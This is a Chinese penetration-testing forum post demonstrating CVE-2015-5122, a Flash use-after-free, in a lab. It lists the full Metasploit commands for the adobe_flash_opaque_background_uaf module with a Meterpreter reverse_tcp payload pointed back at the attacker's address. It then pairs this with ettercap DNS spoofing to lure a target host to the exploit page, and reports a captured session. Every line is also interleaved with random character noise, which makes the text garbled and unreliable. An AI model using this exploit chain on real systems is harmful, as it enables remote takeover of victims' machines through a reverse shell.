中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

# Z+ K2 f0 W4 z0 [" y9 S0 C 二、cve2015-5122漏洞实例演示虚拟机 - V" ^8 w( [/ b0 B6 Q: y

0 V) }4 A; h9 y7 w. _3 d 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 0 x) d Z9 p1 D; u

6 m/ A. h# g1 q7 u/ M search cve-2015-5122如图： 2 m3 A$ Y$ l# ?' l( N; o

; ]7 d) s Z3 m# A! Z- V( R8 b 5 }! e- l" D; N T5 l

. o- w5 g' s1 U" K" r* t) _ 下面我们敲如下命令： 0 l3 [* j& O, o& N! N

/ @1 t% w! Y3 |0 ~' t% Z use exploit/multi/browser/adobe_flash_opaque_background_uaf : ?! g# m1 P1 q* O: d/ }) y

4 `# s% e- b9 }8 ^ set PAYLOAD windows/meterpreter/reverse_tcp 9 Y6 H' }6 Q. _, l

8 A% P$ U6 E5 g4 x0 N2 g% o6 T set LHOST 192.168.0.109 k( _1 D4 {/ D

+ Q8 a; Z8 n) p! A4 a! b2 Q set URIPATH / /*根目录*/ : F; S4 A1 _% t

( I7 k& z& v! \6 d9 x% w/ Y e. T0 c set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 8 g/ n, w2 b" C# ?5 D& }

1 v4 W+ O3 b+ r. q set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 2 g- Y0 r4 B9 @) w7 T. @2 r3 l

+ i) C' a& r5 |( f 然后show options如图： 2 Q/ y' U' }9 C! R/ O

+ r8 g, [* u; D! u + C( O, @7 Y/ e+ F; [9 v4 N

3 u4 x8 h R9 A3 r4 v+ K6 g" n 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
" ` A) q; h+ s' _2 A 4 b. f6 X8 m3 J+ a. H. m

+ r @" r6 B2 U" } 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 8 V" o! |1 c w4 s* y/ U7 V

7 R1 x, Q; q a7 c# I5 _ Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 V6 a( w* E& l

( e7 f: H) {# ?3 m& F ) G0 D0 O2 a* L

7 r% L0 f) J3 n% L 成功了，这时候我们断开ettercap，如图： 6 N3 g& m; @1 f9 o2 O m2 b2 F) a

2 C6 g8 L( d9 O' s. D5 g ; ~3 D d4 A1 M& t, |

% l2 v( B/ s/ U, p8 @1 |4 s, [ Screenshot如图： . C; b: e# W A+ G/ [" Z

" c2 b* P* |- Q: P- h* _ 5 {7 R# O/ u0 V9 U! q& Z

5 \" r1 y' W% \: q. } ; i0 r/ N9 o7 `) g1 b. T$ k1 `5 D

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)